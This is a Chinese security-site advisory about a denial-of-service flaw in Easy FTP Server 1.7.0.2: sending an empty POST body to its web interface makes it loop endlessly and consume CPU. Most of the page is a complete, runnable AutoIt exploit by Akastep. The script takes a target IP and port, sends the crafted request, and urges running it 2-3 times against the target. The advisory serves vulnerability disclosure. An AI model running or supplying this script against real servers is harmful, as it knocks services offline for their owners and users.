Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Easy FTP Server远程拒绝服务漏洞

发布日期:2013-04-06
更新日期:2013-04-10受影响系统:
easyftpsvr easyftpsvr 1.7.0.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 58920
 
Easy FTP Server是基于Windows的多用户ftp服务器,具有Web访问界面。
 
Easy FTP Server 1.7.0.2及其他版本的Web接口在收到内容为空的$_POST请求后,会进入无限循环并消耗大量CPU资源,导致拒绝服务。
 
<*来源:Akastep
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
 #AutoIt3Wrapper_Outfile=smdcpu.exe
 #AutoIt3Wrapper_UseUpx=n
 #AutoIt3Wrapper_Change2CUI=y
 #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
 #include "WinHttp.au3"
 #include <String.au3>
 
#cs
 
easyftpsvr-1.7.0.2 CPU consumption exploit.
 The vulnerability is due easyftpsvr-1.7.0.2 "s web interface (Easy-Web
Server/1.0) contains flaw when accepting $_POST requests with EMPTY
body.
 In this case application runs into infinitve loop and consumes very high
CPU usage.
 Running following exploit 2-3 times against target machine that runs 
 easyftpsvr-1.7.0.2  (against it native web interface called Easy-Web
Server/1.0)
 consumes high CPU usage.
 
----------------  Be Carefull! -----------------
 
*DO not run it against your real machine.(Instead of use Virtualbox)*
 Otherwise hard reboot is your best friend.
 
Demo vid:  http://youtu.be/fq1ebZGkoJM
 
------------------------------------------------
 /AkaStep
 
#ce
 
Opt("MustDeclareVars", 1)
  
Global $INVALIDIP="INVALID IP FORMAT";
 Global $INVALIDPORT="INVALID PORT NUMBER!";
  Global $f=_StringRepeat("#",10);
 
Global $msg_usage=$f & "  easyftpsvr-1.7.0.2 CPU consumption exploit " &
StringMid($f,1,7) & @CRLF & _
 $f & " Usage:  " & _
 @ScriptName &  " REMOTEIP " &  " REMOTEPORT  " & $f & @CRLF & _
 StringReplace($f,"#","") & _StringRepeat(" ",10)  & _
 "HACKING IS LIFESTYLE!" & _StringRepeat(" ",10) & 
 StringReplace($f,"#","/")
 
if $CmdLine[0]=0 Then
 MsgBox(64,"easyftpsvr-1.7.0.2 CPU consumption exploit","This is a
console Application!" & @CRLF & "More Info: "  & @ScriptName & " --help"
& @CRLF & _
 "Invoke It from MSDOS!",5)
 exit;
 EndIf
 if  $CmdLine[0] <> 2 Then
 ConsoleWrite(@CRLF & _StringRepeat("#",62) & @CRLF & $msg_usage &
@CRLF & _StringRepeat("#",62) & @CRLF);
 exit;
 EndIf
 
ConsoleWrite(@CRLF & _StringRepeat("#",62) & @CRLF & $msg_usage & @CRLF
& _StringRepeat("#",62) & @CRLF);
 
Global $ipaddr=StringMid($CmdLine[1],1,15);//255.255.255.255
 Global $port=StringMid($CmdLine[2],1,5);//65535
   Global $useragent="Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101
Firefox/20.0";
 Global $reqmethod="POST";
 global $root_dir="/";
 Global $thisconsumes="";//<=This is a reason of High CPU consumption.
Empty $_POST body causes application to run into infinitve loop//
  Global $hOpen = _WinHttpOpen($useragent);
 Global $hConnect = _WinHttpConnect($hOpen, $ipaddr,$port)
 Global $hRequest =
_WinHttpOpenRequest($hConnect,$reqmethod,$root_dir,Default,Default,"");
 _WinHttpAddRequestHeaders($hRequest, "Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" &
@CRLF)
 _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5"&
@CRLF)
 _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate"&
@CRLF)
 _WinHttpAddRequestHeaders($hRequest, "DNT: 1"& @CRLF)
 _WinHttpAddRequestHeaders($hRequest, "Connection: close"& @CRLF)
 
_WinHttpSendRequest($hRequest, -1, $thisconsumes);// send empty $_POST
body.//
 
Global $sHeader, $sReturned
 If _WinHttpQueryDataAvailable($hRequest) Then
 
$sHeader = _WinHttpQueryHeaders($hRequest)
 $sReturned &= _WinHttpReadData($hRequest)
 _WinHttpCloseHandle($hRequest)
 _WinHttpCloseHandle($hConnect)
 _WinHttpCloseHandle($hOpen)
 EndIf
 
ConsoleWrite(_StringRepeat("#",62) & @CRLF & _StringRepeat(" ",10)  &"
PACKET WAS SENT! " &  _StringRepeat(" ",10) & @CRLF &
_StringRepeat("#",62));
 ConsoleWrite(@CRLF & $f &  " Run this exploit 2-3 times against target
it will consume CPU deadly. " & $f & @CRLF);
 Exit;建议:
--------------------------------------------------------------------------------
厂商补丁:
 
easyftpsvr
 ----------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
https://code.google.com/p/easyftpsvr/Rockwell Automation FactoryTalk Services Platform拒绝服务漏洞Apache Subversion 段错误拒绝服务漏洞(CVE-2013-1847)相关资讯      Easy FTP Server  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图